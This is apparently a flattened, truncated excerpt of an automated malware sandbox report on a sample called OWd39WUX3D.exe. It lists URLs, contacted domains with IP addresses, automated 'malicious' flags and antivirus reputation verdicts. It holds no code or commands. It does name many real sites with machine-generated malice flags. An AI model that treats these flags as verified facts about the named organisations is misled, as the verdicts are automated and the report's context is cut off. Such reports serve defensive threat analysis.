              https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/0%Avira URL Cloudsafe
              https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F0%Avira URL Cloudsafe
              https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polp0%Avira URL Cloudsafe
              http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.160%Avira URL Cloudsafe
              http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.70%Avira URL Cloudsafe
              http://www.myropcb.com/why-use-myro/terms-of-service/0%Avira URL Cloudsafe
              http://www.pcgrate.com0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/0%Avira URL Cloudsafe
              http://www.ora-ito.com/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              holp-ai.com
              59.106.13.169
              truetrueunknown
              impexnc.com
              208.91.197.46
              truetrueunknown
              webways.com
              104.21.1.51
              truetrueunknown
              www.fcwcvt.org
              104.21.25.200
              truefalseunknown
              dayvo.com
              104.21.68.7
              truetrueunknown
              hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
              3.130.204.160
              truefalse
                high
                enguita.net
                195.5.116.23
                truetrueunknown
                shteeble.com
                185.106.129.180
                truetrueunknown
                dataform.co.uk
                83.223.113.46
                truetrueunknown
                evcpa.com
                192.124.249.10
                truefalseunknown
                shittas.com
                192.3.246.178
                truetrueunknown
                kallman.net
                0.0.0.0
                truetrueunknown
                missnue.com
                104.21.234.121
                truetrueunknown
                gphpedit.org
                127.0.0.1
                truetrueunknown
                bible.org
                104.20.54.214
                truefalse
                  high
                  jsaps.com
                  49.212.235.59
                  truetrueunknown
                  avse.hu
                  185.129.138.60
                  truetrueunknown
                  pohlfood.com
                  104.218.10.254
                  truefalseunknown
                  notis.ru
                  185.178.208.141
                  truefalseunknown
                  canasil.com
                  104.26.2.14
                  truetrueunknown
                  www.jenco.co.uk
                  104.21.23.9
                  truetrueunknown
                  www.tyrns.com
                  217.79.184.35
                  truetrueunknown
                  willsub.com
                  69.89.107.122
                  truefalse
                    high
                    nts-web.net
                    49.212.235.175
                    truetrueunknown
                    shesfit.com
                    172.67.158.251
                    truetrueunknown
                    ldh.la.gov
                    75.2.95.235
                    truefalse
                      high
                      www.vexcom.com
                      172.67.173.200
                      truefalseunknown
                      cpmteam.com
                      104.21.32.240
                      truefalse
                        high
                        tcpoa.com
                        159.89.244.183
                        truetrueunknown
                        kevyt.net
                        104.21.2.101
                        truefalseunknown
                        www.mobilnic.net
                        154.203.14.100
                        truefalseunknown
                        s5w.com
                        192.99.226.184
                        truetrueunknown
                        www.sclover3.com
                        157.112.182.239
                        truefalseunknown
                        in1.smtp.messagingengine.com
                        103.168.172.217
                        truetrueunknown
                        dog-jog.net
                        153.122.24.177
                        truetrueunknown
                        kamptal.at
                        128.204.134.138
                        truetrueunknown
                        bd-style.com
                        103.112.69.92
                        truetrueunknown
                        ora.ecnet.jp
                        60.43.154.138
                        truefalse
                          high
                          adventist.ro
                          49.12.155.123
                          truetrueunknown
                          www.edimart.hu
                          81.2.194.241
                          truefalseunknown
                          zupraha.cz
                          77.78.104.3
                          truetrueunknown
                          isom.org
                          192.124.249.14
                          truetrueunknown
                          any-s.net
                          108.170.12.50
                          truetrueunknown
                          muhr-soehne.de
                          5.189.171.125
                          truetrueunknown
                          www.railbook.net
                          208.91.197.46
                          truetrueunknown
                          hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                          54.161.222.85
                          truefalse
                            high
                            oaith.ca
                            192.124.249.12
                            truetrueunknown
                            akr.co.id
                            104.20.123.68
                            truetrue
                              unknown
                              shztm.ru
                              62.122.170.171
                              truetrue
                                unknown
                                www.abdg.com
                                192.252.154.18
                                truefalse
                                  unknown
                                  www.spanesi.com
                                  5.196.166.214
                                  truefalse
                                    unknown
                                    aiolos-sa.gr
                                    104.21.26.121
                                    truetrue
                                      unknown
                                      usadig.com
                                      198.100.146.220
                                      truetrue
                                        unknown
                                        metaforacom.com
                                        185.42.105.162
                                        truetrue
                                          unknown
                                          dhh.la.gov
                                          52.200.51.73
                                          truefalse
                                            high
                                            gmail-smtp-in.l.google.com
                                            172.253.63.27
                                            truefalse
                                              high
                                              fdlymca.org
                                              192.124.249.9
                                              truetrue
                                                unknown
                                                assideum.com
                                                52.219.80.107
                                                truetrue
                                                  unknown
                                                  smtp1.sbc.mail.am0.yahoodns.net
                                                  67.195.12.38
                                                  truefalse
                                                    unknown
                                                    cbras.com
                                                    54.39.198.18
                                                    truetrue
                                                      unknown
                                                      bidroll.com
                                                      13.56.33.8
                                                      truetrue
                                                        unknown
                                                        atbauk.org
                                                        172.67.196.145
                                                        truefalse
                                                          unknown
                                                          www.naoi-a.com
                                                          202.254.236.40
                                                          truefalse
                                                            unknown
                                                            www.vazir.se
                                                            206.191.152.37
                                                            truetrue
                                                              unknown
                                                              d2r2uj0bnofxxz.cloudfront.net
                                                              13.249.85.117
                                                              truefalse
                                                                high
                                                                www.valselit.com
                                                                193.70.68.254
                                                                truefalse
                                                                  unknown
                                                                  vvsteknik.dk
                                                                  185.31.76.90
                                                                  truetrue
                                                                    unknown
                                                                    www.clinicasanluis.com.co
                                                                    172.67.164.178
                                                                    truetrue
                                                                      unknown
                                                                      biosolve.com
                                                                      151.101.130.159
                                                                      truefalse
                                                                        unknown
                                                                        karmy.com.pl
                                                                        185.253.212.22
                                                                        truetrue
                                                                          unknown
                                                                          www.fe-bauer.de
                                                                          3.65.101.129
                                                                          truefalse
                                                                            unknown
                                                                            smtp.mail.global.gm0.yahoodns.net
                                                                            66.218.88.167
                                                                            truetrue
                                                                              unknown
                                                                              vdoherty.com
                                                                              91.216.241.100
                                                                              truetrue
                                                                                unknown
                                                                                hbfuels.com
                                                                                85.233.160.146
                                                                                truetrue
                                                                                  unknown
                                                                                  td-ccm-neg-87-45.wixdns.net
                                                                                  34.149.87.45
                                                                                  truefalse
                                                                                    unknown
                                                                                    pb-games.com
                                                                                    173.254.28.29
                                                                                    truefalse
                                                                                      unknown
                                                                                      mackusick.de
                                                                                      217.160.0.131
                                                                                      truetrue
                                                                                        unknown
                                                                                        ncn.de
                                                                                        46.30.60.158
                                                                                        truetrue
                                                                                          unknown
                                                                                          cvswl.org
                                                                                          104.21.55.151
                                                                                          truetrue
                                                                                            unknown
                                                                                            nekono.net
                                                                                            202.172.28.187
                                                                                            truetrue
                                                                                              unknown
                                                                                              fnw.us
                                                                                              137.118.26.67
                                                                                              truetrue
                                                                                                unknown
                                                                                                komie.com
                                                                                                59.106.13.181
                                                                                                truetrue
                                                                                                  unknown
                                                                                                  ftmobile.com
                                                                                                  199.34.228.78
                                                                                                  truetrue
                                                                                                    unknown
                                                                                                    www.x0c.com
                                                                                                    104.247.81.50
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      sledsport.ru
                                                                                                      185.22.232.175
                                                                                                      truetrue
                                                                                                        unknown
                                                                                                        onzcda.com
                                                                                                        13.248.169.48
                                                                                                        truetrue
                                                                                                          unknown
                                                                                                          www.findbc.com
                                                                                                          13.248.169.48
                                                                                                          truetrue
                                                                                                            unknown
                                                                                                            tbvlugus.nl
                                                                                                            174.129.25.170
                                                                                                            truefalse
                                                                                                              high
                                                                                                              pellys.co.uk
                                                                                                              77.72.4.226
                                                                                                              truetrue
                                                                                                                unknown
                                                                                                                infotech.pl
                                                                                                                79.96.32.254
                                                                                                                truetrue
                                                                                                                  unknown
                                                                                                                  cubodown.com
                                                                                                                  91.195.240.94
                                                                                                                  truetrue
                                                                                                                    unknown
                                                                                                                    semuk.com
                                                                                                                    86.105.245.69
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      tozzhin.com
                                                                                                                      202.94.166.30
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        tabbles.net
                                                                                                                        80.211.41.39
                                                                                                                        truetrue
                                                                                                                          unknown
                                                                                                                          cqdgroup.com
                                                                                                                          221.132.33.88
                                                                                                                          truetrue
                                                                                                                            unknown
                                                                                                                            www.muhr-soehne.de
                                                                                                                            5.189.171.125
                                                                                                                            truetrue
                                                                                                                              unknown
                                                                                                                              fortknox.bm
                                                                                                                              216.177.137.32
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                camamat.com
                                                                                                                                104.21.235.32
                                                                                                                                truetrue
                                                                                                                                  unknown
                                                                                                                                  mail.airmail.net
                                                                                                                                  66.226.70.66
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    lyto.net
                                                                                                                                    104.21.62.182
                                                                                                                                    truetrue
                                                                                                                                      unknown
                                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                                      http://skypearl.com/true
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.clinicasanluis.com.co/true
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://univi.it/true
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://likangds.com/true
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.elpro.si/false
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.credo.edu.pl/false
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      http://sigtoa.com/true
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://dhh.la.gov/false
                                                                                                                                        high
                                                                                                                                        http://www.naoi-a.com/false
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.abdg.com/false
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://msl-lock.com/false
                                                                                                                                          high
                                                                                                                                          https://ldh.la.gov/false
                                                                                                                                            high
                                                                                                                                            http://calvinly.com/false
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.ora-ito.com/false
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                            https://www.stajerskagz.si/o-sgz-2/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://www.com-sit.com/usa/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornikOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.62OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svgOWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://oss.maxcdn.com/respond/1.4.2/respond.min.jsOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpgOWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcOWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://pohlfood.com/#websiteOWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.pcgrate.com/#webpageOWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://inhouse.pohlfood.com/OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svgOWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26c380492a5e27db8a412ecddOWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.com-sit.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 